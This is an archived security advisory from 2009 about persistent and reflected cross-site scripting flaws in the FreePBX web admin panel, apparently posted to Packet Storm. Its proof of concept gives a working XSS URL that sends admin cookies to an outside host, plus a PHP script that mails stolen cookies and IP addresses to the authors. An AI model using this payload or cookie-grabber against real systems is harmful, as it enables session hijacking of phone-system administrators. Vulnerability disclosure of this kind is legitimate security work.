what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

PBX Business Phone Application Cross Site Scripting

PBX Business Phone Application Cross Site Scripting
Posted Dec 29, 2009
Authored by Global-Evolution

PBX Business Phone Application versions 2.6.x and 2.5.2.x suffer from cross site scripting vulnerabilities.

tags | exploit, vulnerability, xss
SHA-256 | 886047044217ae24eb16b112ceab362b9ef013693e7ffa9d96423340b9863927

PBX Business Phone Application Cross Site Scripting

Change Mirror Download
PenTest Information:
====================
Global-Evolution Security Team (~remove) discover multiple Vulnerabilities on PBX Phone System Application.
An attacker can get sensitive customer/admin session-data over multiple Cross-Site-Scripting vulnerabilities.


Details
=======
Tested on OS: Windows 7 VBox
Tested with Software: Mozilla Firefox 3.5.x (Portable|Mod)

Vulnerable Products: PBX Business Phone Application
Affected Versions: v2.6.x & 2.5.2.x
Vulnerability Type: Multiple Cross Site Scripting (Server-Side & Client-Side)
Security-Risk: Low & Medium (1.1 & 1.2)

Vendor-URL: http://www.freepbx.org/
Source-URL: http://www.freepbx.org/download-freepbx

Vendor-Status: Not Informed
Patch/Fix-Status: Fixed version not released
Advisory-Status: Published | 25.12.2009

Advisory-URL: *censored
Report-URL: *censored

GE DB-ID: ()
CVE-ID: ()
OSVDB-ID: ()




Introduction
============
It's Hard to Beat Free FreePBX is for both developers and people searching for a Business Phone System.
The new to FreePBX, Asterisk® or FreeSWITCH by PBX. FreePBX is an easy to use GUI (graphical user interface)
that controls and manages Asterisk, the world's most popular open source telephony engine software. FreePBX
has been developed and hardened by thousands of volunteers over tens of thousands man hours. FreePBX has been
downloaded over 5,000,000 times and estimates over 500,000 active phone systems. If you don't know about FreePBX,
you are probably paying too much for your phone system. Government in Europe & USA mostly use that Software to
configure Phone System inside of the offices.

(Copy from the Vendor's Homepage: http://www.freepbx.org/)



More Details
============
1.1
Multiple XSS Vulnerabilities are detected on client-side(persistent). An attacker with low privilegs is able
to include own bad script routines on client-side(Example;PHP;JS) of the phone application. Attackers can get Session-Data(Cookies)
of customers/admins over multiple Cross Site Scripting Vulnerabilities.

Vulnerable Module:
[+] Trunk/Tech

Path: /admin/admin/
File: config.php
Para: ?display=trunks&tech=


1.2
Multiple XSS Vulnerabilities are detected on server-side. An attacker with low privilegs is able
to include own bad script routines on server-side(Example;PHP;JS) of the phone application. Attackers can get Session-Data(Cookies)
of customers/admins over multiple Cross Site Scripting Vulnerabilities.

Vulnerable Module:
[+] Add Recordings
[+] Add Zap Channel

Proof of Concept
================
This vulnerabilities can be exploited ...

1.1

location.href='https://127.0.0.1:8080/admin/admin/config.php?display=trunks&tech=%3C/script%3E%20%22%3E
%3Cscript%20src%3Dhttp%3A//global-evolution.info/etc/grep.php%3E%3C/script%3E?nice='+escape(document.cookie)

<?
$cookie = $_GET['nice'];
$ip = getenv("REMOTE_ADDR");
$Time = date("l dS of F Y h:i:s A");
$msg = "Cookie: $cookie\nIP Address: $ip\Time: $Time";
$subject = "cookie";
mail("notification@global-evolution.info", $subject, $msg);
header ("location: http://127.0.0.1:8080/admin/");
?>



1.2

<form name="editZapchandid" action="" method="post" onsubmit="return checkZapchandid(editZapchandid);">
<input type="hidden" name="extdisplay" value="">
<input type="hidden" name="channel" value="">
<input type="hidden" name="action" value="add">
<table><tr><td colspan="2"><h5>Add Channel<hr></h5></td></tr>
<tr><td><a href="#" class="info">Channel:<span>The Zap Channel number to map to a DID</span></a></td>
<td><input size="5" type="text" name="channel" value="" tabindex="1"></td>
</tr><tr><td><a href="#" class="info">Description:<span>A useful description describing this channel</span></a></td>
<td><input size="40" type="text" name="description" value="INSERT 0WN SCRIPTCODE HERE!!!" tabindex="2"></td>
</tr><tr><td><a href="#" class="info">DID:<span>The DID that this channel represents. The incoming call on this channel
will be treated as if it came in with this DID and can be managed with Inbound Routing on DIDs</span></a></td>
<td><input size="40" type="text" name="did" value="" tabindex="3"/></td>
</tr><tr><td colspan="2"><br><input name="Submit" type="submit" value="Submit Changes" tabindex="4">
</td></tr></table></form>



Fix / Patch
============
Restrict on the modules Zap Channel, Recordings & the Tech/Trunk input fields with a more
secure mask like (;:->"<'*",.[]) & format it with specialchars to get a secure output.



Security Risk
=============
1.1
An attacker is able to get sessioninformation or include bad script routines with xss on client-side(not persistent).
The security risk is estimated as low because of client-side.

1.2
An attacker is able to get sessioninformation or include bad script routines with xss on server-side(persistent).
The security risk is estimated as medium because of server-side.



Authors
=======
The author & writer is part of the private "Global-Evolution" Security(GESEC) Group.
GESEC Vulnerability-Research Team protects software, services, applications & informs the vendors on a secured base.
More information about Global-Evolution Security ... global-evolution.info

________.__ ___. .__ ___________ .__ __ .__
/ _____/| | ____\_ |__ _____ | | \_ _____/__ ______ | | __ ___/ |_|__| ____ ____
/ \ ___| | / _ \| __ \\__ \ | | ______ | __)_\ \/ / _ \| | | | \ __\ |/ _ \ / \ (c)
\ \_\ \ |_( <_> ) \_\ \/ __ \| |__ /_____/ | \\ ( <_> ) |_| | /| | | ( <_> ) | \
\______ /____/\____/|___ (____ /____/ /_______ / \_/ \____/|____/____/ |__| |__|\____/|___| /
\/ \/ \/ \/ \/

Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    8 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    11 Files
  • 23
    Apr 23rd
    68 Files
  • 24
    Apr 24th
    23 Files
  • 25
    Apr 25th
    16 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close